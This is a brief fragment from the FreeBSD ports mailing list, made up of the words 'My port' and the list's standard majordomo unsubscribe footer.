My port To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message